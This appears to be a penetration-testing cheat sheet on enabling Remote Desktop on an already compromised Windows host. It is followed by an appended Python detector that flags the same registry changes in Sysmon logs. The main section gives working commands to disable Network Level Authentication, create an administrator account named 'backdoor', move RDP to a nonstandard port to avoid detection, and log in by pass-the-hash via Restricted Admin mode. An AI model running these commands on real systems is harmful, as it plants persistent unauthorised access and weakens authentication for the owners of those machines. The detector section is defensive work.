Overview

After gaining admin access, enabling RDP provides a stable GUI session — useful for manual enumeration, credential harvesting through GUI apps, and persistent re-entry without relying on reverse shells.

Enable via Registry

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable Network Level Authentication (allows connection without NLA):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Enable via PowerShell

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
One-liner:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Firewall Rules

Allow RDP through Windows Firewall (cmd):
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
Or add rule manually:
netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow

Add User to Remote Desktop Users

net localgroup "Remote Desktop Users" USERNAME /add
Create new user and add to RDP group:
net user backdoor Password123! /add
net localgroup "Remote Desktop Users" backdoor /add
net localgroup "Administrators" backdoor /add

Change RDP Port

Useful to avoid detection on default port 3389:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 44300 /f
Update firewall for new port:
netsh advfirewall firewall add rule name="RDP-44300" protocol=TCP dir=in localport=44300 action=allow
Restart RDP service:
net stop TermService /y && net start TermService

Connect

From Linux:
xfreerdp /v:TARGET_IP /u:USERNAME /p:PASSWORD /cert:ignore +clipboard /dynamic-resolution
With custom port:
xfreerdp /v:TARGET_IP:44300 /u:USERNAME /p:PASSWORD /cert:ignore
From Windows:
mstsc /v:TARGET_IP

Enable via Metasploit

msf6 > use post/windows/manage/enable_rdp
msf6 post(enable_rdp) > set SESSION 1
msf6 post(enable_rdp) > set USERNAME backdoor
msf6 post(enable_rdp) > set PASSWORD Password123!
msf6 post(enable_rdp) > run

Restricted Admin Mode

Allows Pass-the-Hash over RDP (no plaintext password needed).
Enable on target:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
Connect with hash:
xfreerdp /v:TARGET_IP /u:Administrator /pth:NTLM_HASH /cert:ignore

Quick Reference

Method           | Command                                   | Requires
Registry         | reg add ... fDenyTSConnections            | Admin
PowerShell       | Set-ItemProperty + Enable-NetFirewallRule | Admin
Metasploit       | post/windows/manage/enable_rdp            | Meterpreter session
Restricted Admin | DisableRestrictedAdmin + xfreerdp /pth:   | Admin + NTLM hash
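Added example, not part of this page: a small Python detector for the registry changes listed above (fDenyTSConnections, UserAuthentication, PortNumber, DisableRestrictedAdmin), run over Sysmon Event ID 13 "RegistryEvent (Value Set)" records. The EventID, Image, ProcessId, TargetObject and Details field names are Sysmon's; the records themselves are constructed samples.

```python
import re
from typing import Optional

# Registry value name suffix -> (DWORD value the commands above set, what that change means).
WATCHED = {
    r"control\terminal server\fdenytsconnections": (0, "RDP enabled"),
    r"winstations\rdp-tcp\userauthentication": (0, "NLA disabled"),
    r"control\lsa\disablerestrictedadmin": (0, "Restricted Admin mode enabled"),
}
DEFAULT_RDP_PORT = 3389
# Sysmon renders DWORD values as "DWORD (0x00000000)" in the Details field.
_DWORD = re.compile(r"DWORD \((0x[0-9a-fA-F]+)\)")

def classify(event: dict) -> Optional[str]:
    """Return a finding for a Sysmon Event ID 13 record matching a watched change, else None."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "").lower()
    m = _DWORD.search(event.get("Details", ""))
    if not m:
        return None
    value = int(m.group(1), 16)
    who = f"{event.get('Image', '?')} (pid {event.get('ProcessId', '?')})"
    for suffix, (bad, meaning) in WATCHED.items():
        if target.endswith(suffix) and value == bad:
            return f"{meaning} by {who}"
    # Any listener port other than 3389 is the "Change RDP Port" evasion step.
    if target.endswith(r"winstations\rdp-tcp\portnumber") and value != DEFAULT_RDP_PORT:
        return f"RDP listener moved to port {value} by {who}"
    return None

def scan(events) -> list:
    """Collect findings from an iterable of event records."""
    return [f for f in (classify(e) for e in events) if f]

# Constructed sample records (not real telemetry) mirroring the commands on this page.
_REG = r"C:\Windows\System32\reg.exe"
_TS = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": _REG, "ProcessId": 4120, "Details": "DWORD (0x00000000)",
     "TargetObject": _TS + r"\fDenyTSConnections"},
    {"EventID": 13, "Image": _REG, "ProcessId": 4120, "Details": "DWORD (0x00000000)",
     "TargetObject": _TS + r"\WinStations\RDP-Tcp\UserAuthentication"},
    {"EventID": 13, "Image": _REG, "ProcessId": 4120, "Details": "DWORD (0x0000AD0C)",  # 44300
     "TargetObject": _TS + r"\WinStations\RDP-Tcp\PortNumber"},
    {"EventID": 13, "Image": _REG, "ProcessId": 4120, "Details": "DWORD (0x00000000)",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin"},
    # Benign: RDP being turned off (value 1) must not fire.
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe", "ProcessId": 900,
     "Details": "DWORD (0x00000001)", "TargetObject": _TS + r"\fDenyTSConnections"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Pair these findings with Event ID 4732 (member added to a local group) to catch the "Remote Desktop Users" additions, which are not registry writes.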